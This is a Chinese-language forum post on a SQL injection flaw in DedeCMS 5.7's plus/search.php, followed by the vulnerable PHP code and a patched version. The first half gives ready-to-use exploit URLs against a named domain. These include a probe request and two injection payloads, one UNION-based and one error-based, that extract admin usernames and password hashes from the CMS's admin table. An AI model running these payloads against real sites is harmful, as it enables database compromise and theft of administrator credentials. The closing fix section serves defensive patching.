dedecms plus/search.php 注入漏洞利用方式以及修复方法
适合低版本dede5.7已经测试过
提交 mumaasp.com/plus/search.php?keyword=as&typeArr[1 uNion 1]=a
看结果如果提示
Safe Alert: Request Error step 2 !
那么直接用下面的exp
mumaasp.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,
17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+
`%23@__admin`%23@`\'`+]=a
<img id="aimg_8657" src="http://img.90sec.org/forumid_10/1301192303ea6ea786298d3fbf.jpg"
alt="QQ截图20130119225931.jpg" width="378" />
看结果如果提示
Safe Alert: Request Error step 1 !
那么直接用下面的exp
mumaasp.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+
from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
<img id="aimg_8658" src="http://img.90sec.org/forumid_10/130119230336d42cf361c166f0.jpg"
alt="QQ截图20130119225757.jpg" width="600" />
如果正常显示证明漏洞不存在了。
存在漏洞的文件/plus/search.php
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
//引入栏目缓存并看关键字是否有相关栏目内容 require_once($typenameCacheFile); if(isset($typeArr) && is_array($typeArr)) { foreach($typeArr as $id=>$typename) { $keywordn = str_replace($typename, ‘ ‘, $keyword); if($keyword != $keywordn) { $keyword = $keywordn; $typeid = $id; //对ID没做任何过滤 导致注入 break; } } } } $keyword = addslashes(cn_substr($keyword,30)); |
修复之后
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
//引入栏目缓存并看关键字是否有相关栏目内容 require_once($typenameCacheFile); if(isset($typeArr) && is_array($typeArr)) { foreach($typeArr as $id=>$typename) { //$keywordn = str_replace($typename, ‘ ‘, $keyword); $keywordn = $keyword; if($keyword != $keywordn) { $keyword = HtmlReplace($keywordn);//防XSS $typeid = intval($id); //强制转换为数字型 break; } } } } $keyword = addslashes(cn_substr($keyword,30)); |